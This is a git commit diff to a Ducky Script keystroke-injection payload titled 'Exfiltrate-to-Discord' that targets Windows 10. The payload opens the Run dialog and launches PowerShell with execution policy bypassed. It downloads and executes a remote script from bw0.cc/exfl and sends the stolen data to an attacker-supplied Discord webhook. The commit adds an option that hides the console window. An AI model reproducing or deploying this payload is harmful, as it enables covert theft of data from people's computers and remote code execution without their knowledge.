Update Exfiltrate-to-Discord.txt

This commit is contained in:
egieb
2025-06-20 20:47:55 +00:00
committed by GitHub
parent 766d740ba0
commit 94ef5e6a0b

View File

@@ -7,14 +7,12 @@ REM Target: Windows 10
REM *SETUP*
REM replace DISCORD_WEBHOOK_HERE with your Discord Webhook Channel and Token ONLY
REM eg. $dc='1206563651960586035/sNqypsq629XmXpc9TP924Dxeox6qMHDCI5e27qJ3fw4ef34wff4wf_df3aFOY' ....
REM To hide the console, use $hide='y' below.
REM some setup for dukie script
DEFAULT_DELAY 100
REM open powershell (remove -W Hidden to show the window)
REM open powershell
DELAY 1000
GUI r
DELAY 750
STRING powershell -Ep Bypass -C $dc='WEBHOOK_HERE'; iex (irm bw0.cc/exfl)
STRING powershell -Ep Bypass -C $hide='y';$dc='WEBHOOK_HERE'; iex (irm bw0.cc/exfl)
ENTER